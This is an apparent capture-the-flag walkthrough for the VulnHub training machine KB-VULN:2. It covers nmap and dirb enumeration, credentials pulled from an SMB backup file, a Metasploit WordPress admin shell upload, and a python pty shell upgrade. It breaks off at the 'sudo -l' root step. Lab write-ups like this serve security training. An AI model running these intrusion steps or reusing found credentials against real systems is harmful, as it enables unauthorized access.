Hello friend’s, hope all doing great as well. This is walkthrough for machine KB-VULN:2 which is good start for beginner’s, machine create by Machineboy and you can simply download it from vulnhub.
#Make sure that add machine address into hosts file.
#nmap
$nmap -sV kb.vuln Nmap scan report for kb.vuln (192.168.1.6) Host is up (0.00031s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) Service Info: Host: UBUNTU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
tried anonymous login with ftp but doesn’t work, port 80 also open so run dirb and got following result.
$dirb http://kb.vuln
tried bruteforce to wordpress login, but no luck then notice Samba service and dig into it smb://kb.vuln and got username and password into backup.zip contain remerber_me.txt
Username:admin Password:MachineBoy141
#exploitation
where got credentials can try different ways to upload backdoor, here is one of the simplest way to upload shell using metasploit-framework.
msf> use exploit/unix/webapp/wp_admin_shell_upload msf> show options msf> set rhosts kb.vuln //set all the required options msf> run
#user
got shell..! so first flag kbadmin folder able to read using www-data user, as well as we already have credentials of kbadmin:MachineBoy141
use python tty python -c ‘import pty; pty.spawn(“/bin/sh”)’ cd /home/kbadmin and got user flag
#root
for root simply tried sudo -l
